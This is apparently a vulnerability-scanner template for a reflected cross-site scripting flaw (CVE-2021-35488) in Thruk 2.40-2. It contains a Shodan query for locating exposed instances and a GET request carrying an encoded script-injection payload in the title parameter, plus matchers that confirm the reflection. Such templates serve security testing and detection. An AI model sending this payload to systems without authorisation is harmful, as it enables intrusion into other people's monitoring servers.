id: CVE-2021-35488

info:
  name: Thruk 2.40-2 - Cross Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it.
  reference:
    - https://www.gruppotim.it/redteam
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35488
    - https://www.thruk.org/changelog.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35488
    cwe-id: CWE-79
  metadata:
    shodan-query: http.html:"Thruk"
    verified: "true"
  tags: cve,cve2021,thruk,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'>"
          - "Thruk Monitoring"
        condition: and

      - type: status
        status:
          - 401